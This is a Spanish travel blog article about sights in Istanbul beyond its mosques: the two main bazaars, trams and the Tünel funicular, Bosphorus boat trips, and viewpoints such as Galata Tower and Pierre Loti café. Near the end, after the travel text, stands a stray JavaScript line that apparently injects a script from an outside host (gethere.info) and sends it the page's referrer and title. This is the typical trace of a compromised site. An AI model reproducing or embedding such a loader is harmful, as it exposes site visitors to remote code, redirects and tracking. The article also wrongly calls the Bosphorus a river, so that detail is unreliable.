Estambul más allá de sus mezquitas

15/09/2014

vistas estambulLa ciudad de las mil mezquitas, en realidad más de tres mil, tiene mucho más que ver que sólo mezquitas. Ya sea por la luz de Estambul, por el aire de ciudad multicultural propio de toda encrucijada de camino (la ciudad se encuentra entre Europa y Asia), o por el exotismo de su mirada callejera, vale la pena perderse unos días en la bella Estambul. Ya en época del Imperio Romano y Bizantino se la consideraba una de las ciudades más bellas de Europa. Y aún lo sigue siendo, sólo que ahora ya no como Constantinopla, que así se la conocía hasta la llegada del Imperio Otomano.

¿Qué ver en Estambul?

Los bazares de Estambul

En Estambul hay dos mercados principales; el conocido como Gran Bazar y el Bazar de las especies. El Gran Bazar de Estambul, en la «ciudad vieja», en la parte europea de Estambul entre los barrios de Nuruosmaniye, Mercan y Beyazıten, es en realidad una población dentro de la ciudad, es el mayor de la ciudad y uno de los mercados más grandes del mundo y todo un monumento que no debe faltar en una visita  de Estambul. ¿Cómo de grande? Pues ocupa una extensión de 45.000 m2, y tiene sus propios servicios como enfermería, correos o seguridad. Más de 64 calles y patios donde se ubican unas 3.600 tiendas, ordenadas según el gremio que trabaja en la calle.

¿Te han quedado ganas de más tiendas? Entonces, debes dirigirte al Bazar de las Especias o Bazar Egipcio, en el barrio de Eminönü, en el puerto europeo. Mucho más asequible en extensión que el Gran Bazar.

Los paseos de Estambul

En Estambul el transporte funciona muy bien. Siempre resulta simpática una ciudad con tranvía. La ciudad ya en 1920 disponía de una excelente red de tranvías. Hoy en día es una forma sencilla y cómoda de recorrer la ciudad. Existen cuatro líneas; pero quizá la línea número uno sea la más interesante para llegar a algunos de los monumentos más importantes: Los bazares, la Mezquita azul o Sultanhamet. A parte, hay un tranvía nostálgico que llevará por un recorrido histórico por la ciudad.

Si prefieres también puedes pasear utilizar el funicular. Hay dos líneas en activo, siendo la del Funicular Karaköy-Beyoğlu Tünel el segundo transporte suburbano más antiguo del mundo, sólo superado por el metro de Londres, y, en todo caso, el funicular en funcionamiento más antiguo que se conoce.

barcos bosforoPero, sin duda, la palma en transportes para dar un paseo por Estambul se lo lleva un recorrido en barco por el Bósforo, el río que delimita geográficamente Europa y Asia. Un recorrido por él nos llevará a cruzar puentes que unen dos continentes desde el puerto de Eminönü hasta casi la desembocadura al Mar Negro.

Miradores de Estambul

Todas las ciudades deben ser contempladas desde arriba; sólo así uno se aproxima a la realidad del lugar. Por eso lo miradores son siempre tan importantes; no sólo para disfrutar de la belleza de los lugares sino para entender la extensión y la personalidad de las ciudades.

estambul 1No pueden faltar en Estambul, precisamente una ciudad tan compleja y llena de matices y contrastes. Mejor una vista aérea para poder entender a la antigua Constantinopla. Algunos de los mejores miradores sobre Estambul son:

Café Pier Loti, en las afueras de la ciudad. Este café con vistas a la ciudad recibe su nombre del novelista francés Julien Viaud que lo frecuentó durante 1876. El café se encuentra en el Eyup, uno de los barrios conservadores de la ciudad y desde su terraza, tomando un buen té, podrás disfrutar de una de las vistas más bellas de Estambul.

Las vistas desde Torre Gálata, de silueta cilíndrica muy característica del skyline de la ciudad, son conocidas como las mejores vistas de Estambul. Desde la colina donde está situada se domina tanto la parte europea como la asiática de la ciudad.

El Valide Han de Estambul fue un gran centro de mercaderes persas, antaño, por allá el año 1651 floreciente, y hoy algo abandonado, pero aún en uso (aunque no es un lugar turístico al uso, y sólo válido para los más atrevidos). Es posible acceder a algún hanlar, las construcciones típicas de los antiguos mercaderes, para tener unas auténticas vistas de Estambul.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO